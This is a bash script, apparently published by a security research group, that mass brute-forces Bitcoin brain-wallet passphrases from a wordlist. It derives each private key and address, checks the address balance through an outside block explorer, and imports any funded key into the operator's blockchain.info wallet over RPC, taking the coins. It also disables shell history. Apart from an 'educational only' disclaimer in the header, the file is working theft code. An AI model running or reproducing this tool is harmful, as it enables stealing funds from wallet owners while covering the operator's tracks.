#!/bin/bash
#
# Tool: MorXCoinPwn
# Author: Simo Ben youssef
# Contact: <simo_at_morxploit_com>
# Coded: 1 September 2013
# Published: 28 February 2014
# MorXploit Research
# http://www.morxploit.com
#
# Description:
# Mass Bitcoin private keys brute forcing/Take over tool.
# Read related paper at http://www.morxploit.com/morxpapers/smashingbitcoins.pdf
#
# Requirements:
# bitcoind, python and keyfmt which could be downloaded from http://www.morxploit.com/morxtools/keyfmt
# A wallet account at blockchain.info
# Tested to work on Linux Ubuntu.
#
# Author discolaimer:
# This code and all information contained in this entire document is for educational, demonstration and testing purposes only.
# I cannot be held responsible for any malicious use. Use at your own risk.
# USE ONLY ON PASSPHRASES THAT YOU OWN ALREADY.

bitcoind="/usr/bin/bitcoind";
host="blockexplorer.com";
rpchost="rpc.blockchain.info"

# Change to your blockchain account login and pass
username="yourblockchainusername";
password="yourblockchainpassword";

banner() {
/usr/bin/clear
/bin/echo "####################################################"
/bin/echo "##       MorXCoin Bitcoin take-over PoC tool      ##"
/bin/echo "## By Simo Ben youssef <Simo_at_Morxploit_dot_com ##"
/bin/echo "##          http://www.morpxloit.com              ##"
/bin/echo "####################################################"
/bin/echo
}

if [[ ! -f /usr/bin/morxkeyfmt || ! -f $bitcoind ]]
then
/usr/bin/clear
banner
echo "[-] either keyfmt or bitcoind were not found. RTFM!"
echo
exit
fi

base58=({1..9} {A..H} {J..N} {P..Z} {a..k} {m..z})
encodeBase58() {
bc <<<"ibase=16; n=${1^^}; while(n>0) { n%3A ; n/=3A }" |
tac | while read n
do echo -n ${base58[n]}
done
}

PrivateKey() {
a=$(echo -n $1 | sha256sum)
a=$(echo $a | cut -c 1-64)
b="80$a";
c=$(echo -n $b | xxd -r -p | sha256sum -b)
c=$(echo $c | cut -c 1-64)
d=$(echo -n $c | xxd -r -p | sha256sum -b)
d=$(echo $d | cut -c 1-64)
e=$(echo $d | cut -c 1-8)
f=$b$e
enc=$(encodeBase58 $f)
}

PrivateToAddress() {
btcaddress=$(echo -n $1 | python keyfmt %a)
}

if [[ -z "$1" || -z "$2" ]]
then
banner
/bin/echo "Usage: $0 <passphrase file> <method>"
/bin/echo "Exp: $0 l33t.dic addressbalance"
/bin/echo "Or: $0 l33t.dic getreceivedbyaddress"
exit;
elif [[ "$2" != "addressbalance" && "$2" != "getreceivedbyaddress" ]]
then
banner
/bin/echo "[-] You need specifiy either addressbalance or getreceivedbyaddress as method"
exit;
fi
/usr/bin/clear
banner
/bin/echo "[*] Passphrases file set to $1"
/bin/echo "[*] Bitcoind set to $bitcoind"
/bin/echo "[*] Method set to $2"
/bin/echo "[*] Take-over started!"

CheckBalance() {
balance=$(wget -q -O - $host/q/$2/$1)
}

unset HISTFILE

line=0
while read word; do
line=$(( $line + 1 ))

PrivateKey "$word"
PrivateToAddress $enc
CheckBalance $btcaddress $2

if [[ $balance > 0 ]]
then
echo "Got => $btcaddress - Balance: $balance"
echo "Importing now =)"
$bitcoind -rpcconnect=$rpchost -rpcport=443 -rpcssl -rpcuser=$username -rpcpassword=$password importprivkey $enc 
# Or locally, you pick =)
#$bitcoind importprivkey $enc "" false
fi

echo "=> $line"
done < $1
echo "All done"
